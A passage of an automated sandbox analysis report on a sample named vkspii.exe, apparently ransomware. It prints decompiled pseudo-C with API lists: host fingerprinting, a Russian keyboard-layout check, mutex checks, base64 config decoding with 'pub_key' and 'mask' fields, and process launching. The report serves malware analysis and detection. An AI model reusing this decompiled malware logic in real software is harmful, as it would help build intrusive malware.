						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

APIs

lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
lstrcatW.KERNEL32(00000000,?), ref: 004067A8
lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9

Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
FindClose.KERNEL32(00003000,?,?), ref: 0040682E

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
Instruction ID: 9b87114a5c2e2fa11aec6284b95cd243dd4daa46cd42d80c1a26711d7dff17e5
Opcode Fuzzy Hash: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
Instruction Fuzzy Hash: 6F012D31A0021DABDF21AB60DC48BEE7BB8EF44704F0444B6F806E61A1D7798A91CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00403190 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403190(char _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t1 =  &_a4; // 0x405135
				_t13 =  *_t1;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t2 =  &_a4; // 0x405135
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA( *_t2, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

APIs

lstrcmpiA.KERNEL32(5Q@,mask,5Q@,?,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031B9
lstrcmpiA.KERNEL32(5Q@,pub_key,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031D1

Strings

5Q@, xrefs: 00403193, 004031C4, 004031B6
mask, xrefs: 004031B1
5Q@, xrefs: 004031B0
pub_key, xrefs: 004031BF

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: 5Q@$5Q@$mask$pub_key
API String ID: 1586166983-363831109
Opcode ID: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
Instruction ID: 77421031a41d7d6ff0c7d7d831153f50eac579c1ccc453c74b5f930fdf35060a
Opcode Fuzzy Hash: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
Instruction Fuzzy Hash: 09F0F6713082845EF7194E689C41BA3BFCD9B59311F5805BFE689E62D1C6BD8D81839C

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00403B32
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
Instruction ID: 675139515f83daa62978cf2687ed4dcf32745b37c88ce0392e5ff862a27301cc
Opcode Fuzzy Hash: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
Instruction Fuzzy Hash: 83111EB0D4031C6EEB609B65DC0ABEA7ABCEF08704F008199A548F61C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 00404BA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00404BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0x40ff2c]");
				_t16 =  *0x40ff34; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,00404E7E), ref: 00404C0D
lstrlenA.KERNEL32(00000000,?,00404E7E), ref: 00404C67
lstrcpyA.KERNEL32(?,?,?,00404E7E), ref: 00404C98

Strings

fabian wosar <3, xrefs: 00404C05

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
Instruction ID: 61f71b58efb5150348b69fdc6af893256ae21e9068894ab04c691d9c03621922
Opcode Fuzzy Hash: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
Instruction Fuzzy Hash: CE3128A180E1955BEB328E6844143BBBFA19FC3301F1A01BBCAD1B7386D2394C46C798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vkspii.exePID: 4024, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	710
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004048A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 165
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004048A0(void* __ecx) {
				void* _v8;
				CHAR* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				int _v44;
				int _v48;
				void* _v52;
				char _v72;
				void* _t50;
				int _t75;
				void* _t77;
				short* _t98;
				void* _t102;

				_t82 = __ecx;
				Sleep(0x3e8); // executed
				_t50 = E00404550(_t82); // executed
				if(_t50 != 0) {
					ExitProcess(0); // executed
				}
				_v8 = CreateThread(0, 0, E00402D30, 0, 0, 0);
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
						_t82 = _v8;
						TerminateThread(_v8, 0);
					}
					CloseHandle(_v8);
				}
				E00404640();
				E004040A0(_t82);
				E00405EF0( &_v72);
				_v36 = 0;
				_v32 = 0;
				_v24 = 0;
				_v40 = 0;
				_t97 =  &_v40;
				E00405EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
				_v44 = 0;
				_v12 = 0;
				if(E00404880(_v24) != 0) {
					ExitProcess(0);
				}
				L8:
				while(_v44 == 0) {
					_t97 = _v40;
					_t77 = E00405750(_v24, _v40, _v36, _v32,  &_v12);
					_t102 = _t102 + 0xc;
					if(_t77 != 0) {
						_v44 = 1;
					} else {
						Sleep(0x2710);
					}
				}
				E00405E60( &_v72);
				_v28 = 0;
				_v16 = 0;
				_v48 = 0;
				_v52 = 0;
				__eflags = _v12;
				if(_v12 != 0) {
					_v16 = lstrlenA(_v12);
					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
					_t97 = _v12;
					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
					__eflags = _t75;
					if(_t75 == 0) {
						ExitProcess(0);
					}
					_v48 = 1;
				}
				E00403FF0();
				InitializeCriticalSection(0x412ae8);
				__eflags = _v48;
				if(__eflags == 0) {
					E00403DE0( &_v72);
				} else {
					_t97 = _v16;
					E00403FC0(_v28, _v16, __eflags);
				}
				DeleteCriticalSection(0x412ae8);
				__eflags = E00403A60();
				if(__eflags != 0) {
					E00404330(__eflags);
				}
				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
				__eflags = _v20;
				if(__eflags != 0) {
					GetModuleFileNameW(0, _v20, 0x100);
					E00403BA0(_v20, _t97, __eflags);
					VirtualFree(_v20, 0, 0x8000);
				}
				__eflags =  *0x412ae4;
				if( *0x412ae4 != 0) {
					_t98 =  *0x412ae4; // 0x8d0000
					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
				}
				return E00405FC0( &_v72);
				goto L8;
			}

APIs

Sleep.KERNELBASE(000003E8), ref: 004048AB

Part of subcall function 00404550: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
Part of subcall function 00404550: lstrcpyW.KERNEL32 ref: 004045CF
Part of subcall function 00404550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
Part of subcall function 00404550: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
Part of subcall function 00404550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B

ExitProcess.KERNEL32 ref: 004048BC
CreateThread.KERNEL32 ref: 004048D1
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004048E9
TerminateThread.KERNEL32(00000000,00000000), ref: 004048FC
CloseHandle.KERNEL32(00000000), ref: 00404906
ExitProcess.KERNEL32 ref: 0040496E

Strings

open, xrefs: 00404AC9

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 3160775492-2758837156
Opcode ID: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
Instruction ID: 2fe3139fa9bd6d9f2b7618e63861a0a4b2c33c0f11c60c5fb30394d5f0607533
Opcode Fuzzy Hash: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
Instruction Fuzzy Hash: FD612CB0A40209ABEB14EFA1DD4ABEF7774AB84705F104029F601BA2D1DBB85E45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406D90 Relevance: 154.6, APIs: 62, Strings: 26, Instructions: 551
registrymemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00406D90(char* __ecx) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				int _v28;
				int _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t182;
				long _t183;
				short _t186;
				short _t187;
				short _t188;
				signed int _t189;
				signed int _t194;
				void* _t209;
				signed int _t211;
				signed int _t214;
				WCHAR* _t218;
				WCHAR* _t219;
				long _t228;
				_Unknown_base(*)()* _t233;
				long _t242;
				signed int _t245;
				intOrPtr _t250;
				WCHAR* _t252;
				WCHAR* _t254;
				void* _t263;
				WCHAR* _t269;
				void* _t278;
				WCHAR* _t286;
				void* _t287;
				WCHAR* _t289;
				WCHAR* _t290;
				WCHAR* _t292;
				DWORD* _t296;
				char* _t300;
				short* _t301;
				DWORD* _t307;
				signed int _t310;
				void* _t314;
				char* _t316;
				char* _t318;
				void* _t319;
				void* _t320;

				_t300 = __ecx;
				_t318 = __ecx;
				if( *__ecx != 0) {
					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t300 =  &_v28;
					 *(_t318 + 8) = _t292;
					_v28 = 0x100;
					GetUserNameW(_t292, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
					_v28 = 0x1e;
					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t300 =  &_v28;
					 *(_t318 + 0x14) = _t290;
					GetComputerNameW(_t290, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
					L11:
					if( *(_t318 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
							L35:
							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
								L42:
								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
									L51:
									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
										_v32 = 0;
										_t250 = E00407520(_t318 + 0x2c,  &_v32);
										if(_t250 == 0) {
											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
										}
									}
									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x68) = _t218;
										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
										_v16 = _t219;
										_t81 =  &(_t219[0x306]); // 0x60c
										_v8 = _t81;
										GetWindowsDirectoryW(_t219, 0x100);
										_t300 = _v16;
										_t300[6] = 0;
										_t85 =  &(_t300[0x600]); // 0x600
										_t307 = _t85;
										_t86 =  &(_t300[0x400]); // 0x400
										_v20 = _t307;
										_t88 =  &(_t300[0x604]); // 0x604
										_t89 =  &(_t300[0x608]); // 0x608
										_t90 =  &(_t300[0x200]); // 0x200
										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
										_v24 = 0;
										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
										if(_t228 == 0) {
											_t300 = _v8;
											_v32 = 0x80;
											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
											if(_t242 != 0) {
												GetLastError();
											} else {
												_v24 = 1;
											}
											RegCloseKey(_v28);
											if(_v24 != 0) {
												_t245 = lstrlenW(_v8);
												_t300 = _v8;
												_push(_t300);
												E00406D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
											}
										}
										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
										_t320 = _t320 + 0xc;
										lstrcatW( *(_t318 + 0x68), _v8);
										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
										_v32 = _t233;
										if(_t233 == 0) {
											 *(_t318 + 0x6c) = 0;
										} else {
											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
										}
										 *(_t318 + 0x70) =  *_v20;
										VirtualFree(_v16, 0, 0x8000); // executed
									}
									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
										L78:
										if( *(_t318 + 0x80) == 0) {
											L83:
											return 1;
										}
										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4);
										 *(_t318 + 0x84) = _t182;
										if(_t182 == 0) {
											L82:
											 *(_t318 + 0x80) = 0;
											goto L83;
										}
										_push(_t300);
										_t183 = E004068F0(_t182);
										if(_t183 != 0) {
											goto L83;
										}
										VirtualFree( *(_t318 + 0x84), _t183, 0x8000);
										goto L82;
									} else {
										_v68 = L"UNKNOWN";
										_v64 = L"NO_ROOT_DIR";
										_v60 = L"REMOVABLE";
										_v56 = L"FIXED";
										_v52 = L"REMOTE";
										_v48 = L"CDROM";
										_v44 = L"RAMDISK";
										 *(_t318 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
										_t301 =  &_v132;
										_t186 = 0x41;
										do {
											 *_t301 = _t186;
											_t301 = _t301 + 2;
											_t186 = _t186 + 1;
										} while (_t186 <= 0x5a);
										_t187 =  *L"?:\\"; // 0x3a003f
										_v40 = _t187;
										_t188 =  *0x40e308; // 0x5c
										_v36 = _t188;
										_t189 = 0;
										_v28 = 0;
										do {
											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
											_t310 = GetDriveTypeW( &_v40);
											if(_t310 > 2 && _t310 != 5) {
												_v36 = 0;
												lstrcatW( *(_t318 + 0x7c),  &_v40);
												_v36 = 0x5c;
												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
												lstrcatW( *(_t318 + 0x7c), "_");
												if(GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20) == 0) {
													lstrcatW( *(_t318 + 0x7c), L"0,");
													goto L75;
												}
												_v12 = E00408470(_v20, 0, _v32 * _v24, 0);
												_t296 = _t307;
												_t209 = E00408470(_v16, 0, _v32 * _v24, 0);
												_t314 = _v12;
												_v8 = _t314 - _t209;
												asm("sbb eax, edx");
												_v12 = _t296;
												_t211 = lstrlenW( *(_t318 + 0x7c));
												_push(_t296);
												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
												_t214 = lstrlenW( *(_t318 + 0x7c));
												_push(_v12);
												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
												_t320 = _t320 + 0x20;
												lstrcatW( *(_t318 + 0x7c), ",");
											}
											_t189 =  &(1[_v28]);
											_v28 = _t189;
										} while (_t189 < 0x1b);
										_t194 = lstrlenW( *(_t318 + 0x7c));
										_t300 =  *(_t318 + 0x7c);
										_t300[_t194 * 2 - 2] = 0;
										goto L78;
									}
								}
								__imp__GetNativeSystemInfo( &_v76);
								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t300 = _v76 & 0x0000ffff;
								 *(_t318 + 0x5c) = _t252;
								if(_t300 > 9) {
									L49:
									_push(L"Unknown");
									L50:
									wsprintfW(_t252, ??);
									_t320 = _t320 + 8;
									goto L51;
								}
								_t300 = _t300[E00407510] & 0x000000ff;
								switch( *((intOrPtr*)(_t300 * 4 +  &M004074FC))) {
									case 0:
										_push(L"x86");
										goto L50;
									case 1:
										_push(L"ARM");
										goto L50;
									case 2:
										_push(L"Itanium");
										goto L50;
									case 3:
										_push(L"x64");
										goto L50;
									case 4:
										goto L49;
								}
							}
							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4);
							_v20 = _t254;
							 *(_t318 + 0x50) = _t254;
							_v24 = 0;
							if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28) != 0) {
								L41:
								_push(_t300);
								E00406D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
								wsprintfW( *(_t318 + 0x50), L"error");
								_t320 = _t320 + 8;
								goto L42;
							}
							_v32 = 0x80;
							if(RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32) != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v28);
							if(_v24 != 0) {
								goto L42;
							} else {
								goto L41;
							}
						}
						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v16 = _t263;
						_v28 = _t263 + 0xe;
						 *(_t318 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
						_t316 = 1;
						_v8 = 1;
						_v12 = 0;
						do {
							wsprintfW(_v16, L"%d", _t316);
							_t320 = _t320 + 0xc;
							_v24 = 0;
							_t316 =  &(_t316[1]);
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20) != 0) {
								L27:
								_t269 = 0;
								_v8 = 0;
								L29:
								_t300 = _v12;
								goto L30;
							}
							_v32 = 0x80;
							if(RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32) != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v20);
							if(_v24 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v28, L"00000419") != 0) {
									_t269 = _v8;
									goto L29;
								}
								wsprintfW( *(_t318 + 0x44), "1");
								_t320 = _t320 + 8;
								_t300 = 1;
								_t269 = 0;
								_v12 = 1;
								_v8 = 0;
							}
							L30:
						} while (_t316 != 9 && _t269 != 0);
						if(_t300 == 0) {
							wsprintfW( *(_t318 + 0x44), "0");
							_t320 = _t320 + 8;
						}
						VirtualFree(_v16, 0, 0x8000);
						goto L35;
					}
					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v24 = _t278;
					 *(_t318 + 0x38) = _t278;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16) != 0) {
						L17:
						 *(_t318 + 0x30) = 0;
						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v28 = 0x40;
					if(RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v16);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t318 + 0x20) = _t286;
					if(_t286 == 0) {
						goto L11;
					}
					_push(_t300);
					_t287 = E00406D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
					if(_t287 == 0) {
						wsprintfW( *(_t318 + 0x20), L"undefined");
						L10:
						_t320 = _t320 + 8;
						goto L11;
					}
					_t289 =  *(_t318 + 0x20);
					if( *_t289 != 0) {
						goto L11;
					}
					wsprintfW(_t289, L"WORKGROUP");
					goto L10;
				}
			}

0x00406d90
0x00406d9b
0x00406da7
0x00406db7
0x00406db9
0x00406dbc
0x00406dc1
0x00406dc8
0x00406dc8
0x00406dd2
0x00406ddf
0x00406de6
0x00406de8
0x00406deb
0x00406df0
0x00406df0
0x00406e00
0x00406e56
0x00406e5a
0x00406ef5
0x00406ef9
0x00407024
0x00407028
0x004070d6
0x004070da
0x00407134
0x00407138
0x0040713d
0x00407149
0x00407150
0x00407152
0x00407152
0x00407150
0x00407159
0x0040716d
0x0040717d
0x00407180
0x00407188
0x0040718b
0x00407191
0x00407194
0x0040719a
0x004071a4
0x004071a8
0x004071a8
0x004071ae
0x004071b4
0x004071b8
0x004071bf
0x004071cc
0x004071d4
0x004071dd
0x004071f6
0x004071fe
0x00407200
0x00407214
0x0040721b
0x00407223
0x0040722e
0x00407225
0x00407225
0x00407225
0x00407237
0x00407241
0x00407246
0x0040724c
0x0040724f
0x00407268
0x00407268
0x00407241
0x0040727a
